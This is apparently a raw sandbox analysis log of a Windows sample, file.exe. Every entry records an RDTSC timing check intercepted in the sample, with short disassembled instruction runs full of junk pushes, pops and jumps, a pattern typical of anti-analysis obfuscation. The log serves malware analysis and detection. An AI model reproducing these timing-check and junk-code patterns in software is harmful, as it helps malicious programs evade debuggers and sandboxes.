                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259E23 second address: 1259E33 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0790D58126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259E33 second address: 1259E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125945B second address: 1259461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E328 second address: 125E32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E32E second address: 125E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E332 second address: 125E346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0790D580AEh 0x0000000c jnp 00007F0790D580A6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126394A second address: 126398D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D5812Bh 0x00000007 jmp 00007F0790D58136h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F0790D58137h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E70FA second address: 11E7140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580B1h 0x00000009 popad 0x0000000a jnp 00007F0790D580AEh 0x00000010 jmp 00007F0790D580B7h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F0790D580A6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7140 second address: 11E7148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7148 second address: 11E7152 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0790D580AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266F28 second address: 1266F73 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D5813Dh 0x00000008 js 00007F0790D58126h 0x0000000e jmp 00007F0790D58131h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jns 00007F0790D5813Ch 0x0000001c jng 00007F0790D5812Ah 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12218C9 second address: 1209C89 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D580B9h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0790D580A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov di, bx 0x00000030 pushad 0x00000031 call 00007F0790D580B3h 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 mov esi, 4F05D8E9h 0x0000003e popad 0x0000003f lea eax, dword ptr [ebp+1248362Ah] 0x00000045 jmp 00007F0790D580B5h 0x0000004a nop 0x0000004b jne 00007F0790D580B5h 0x00000051 push eax 0x00000052 jmp 00007F0790D580B1h 0x00000057 nop 0x00000058 movsx edi, ax 0x0000005b sub dword ptr [ebp+122D334Eh], edx 0x00000061 call dword ptr [ebp+122D30A6h] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1221B5E second address: 1221B63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122207E second address: 1222082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222082 second address: 12220FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jp 00007F0790D5813Ch 0x00000012 jnc 00007F0790D5812Ch 0x00000018 popad 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F0790D58128h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov dx, 4FF2h 0x00000038 mov edx, dword ptr [ebp+122D2A23h] 0x0000003e call 00007F0790D58129h 0x00000043 push eax 0x00000044 push edx 0x00000045 jl 00007F0790D58130h 0x0000004b jmp 00007F0790D5812Ah 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122230C second address: 1222310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222566 second address: 1222576 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C0C second address: 1222C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C10 second address: 1222C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0790D58130h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C61 second address: 1222C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C65 second address: 1222C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C6B second address: 1222C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222C71 second address: 1222CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0790D5812Ch 0x0000000e nop 0x0000000f mov edx, dword ptr [ebp+122D2BABh] 0x00000015 lea eax, dword ptr [ebp+1248366Eh] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0790D58128h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F0790D5812Ch 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222CBE second address: 1222D3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D580ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d ja 00007F0790D580A7h 0x00000013 lea eax, dword ptr [ebp+1248362Ah] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0790D580A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 jp 00007F0790D580A7h 0x00000039 nop 0x0000003a push esi 0x0000003b pushad 0x0000003c jmp 00007F0790D580B1h 0x00000041 jmp 00007F0790D580B4h 0x00000046 popad 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c je 00007F0790D580A6h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222D3E second address: 1222D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12673BE second address: 12673C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12677C6 second address: 1267807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F0790D5812Fh 0x0000000e jmp 00007F0790D5812Dh 0x00000013 jl 00007F0790D58126h 0x00000019 popad 0x0000001a push edx 0x0000001b jmp 00007F0790D58133h 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267807 second address: 126780C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A7D second address: 1267A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A83 second address: 1267A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A8E second address: 1267A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C05 second address: 1267C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C0B second address: 1267C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC65 second address: 126DC98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0790D580B6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC98 second address: 126DC9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DC9D second address: 126DCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0790D580B0h 0x0000000b jmp 00007F0790D580AAh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0790D580B2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DCD4 second address: 126DCDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0790D58126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CA0E second address: 126CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580B6h 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CA2E second address: 126CA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0790D58126h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jne 00007F0790D5812Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBA8 second address: 126CBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CBAC second address: 126CBE0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D58135h 0x0000000f pop edx 0x00000010 jns 00007F0790D5813Ch 0x00000016 jmp 00007F0790D5812Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEC6 second address: 126CECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CECA second address: 126CED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CED0 second address: 126CEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D580ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEE0 second address: 126CEEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEEE second address: 126CEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEF2 second address: 126CEF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126CEF8 second address: 126CF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D580AAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126D4F4 second address: 126D524 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D58134h 0x0000000b pushad 0x0000000c jmp 00007F0790D58131h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DAB7 second address: 126DAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0790D580A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126DAC1 second address: 126DAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F0790D58126h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710A8 second address: 12710AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710AC second address: 12710B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710B0 second address: 12710B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710B8 second address: 12710BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710BD second address: 12710CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710CD second address: 12710D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710D4 second address: 12710DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710DA second address: 12710DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12710DE second address: 12710E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C92 second address: 1270CCC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D5812Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F0790D58126h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F0790D58139h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F0790D58131h 0x00000023 push eax 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270CCC second address: 1270CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E24 second address: 1270E39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0790D5812Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E39 second address: 1270E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270E3F second address: 1270E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273543 second address: 1273553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D580ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1273553 second address: 1273568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0790D5812Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D96 second address: 1279DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007F0790D580BEh 0x0000000d jmp 00007F0790D580B8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DBB second address: 1279DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F0790D58126h 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F0790D58140h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DD7 second address: 1279DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DDD second address: 1279DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279DE1 second address: 1279DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127859C second address: 12785B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D58136h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785B6 second address: 12785C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785C0 second address: 12785CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0790D58126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12785CA second address: 12785D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278783 second address: 12787C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58137h 0x00000007 jp 00007F0790D58126h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0790D58128h 0x00000015 jmp 00007F0790D58130h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12787C0 second address: 12787C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278949 second address: 127894F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127894F second address: 127895A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0790D580A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127895A second address: 127897F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007F0790D58138h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127897F second address: 1278984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278AD5 second address: 1278ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278ADA second address: 1278AFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0790D580B9h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F0790D580A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278AFF second address: 1278B09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D58126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278C64 second address: 1278C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12790C1 second address: 12790E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58134h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127DE20 second address: 127DE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0AB second address: 127D0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0B1 second address: 127D0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0B5 second address: 127D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007F0790D58126h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0C5 second address: 127D0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D0C9 second address: 127D0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
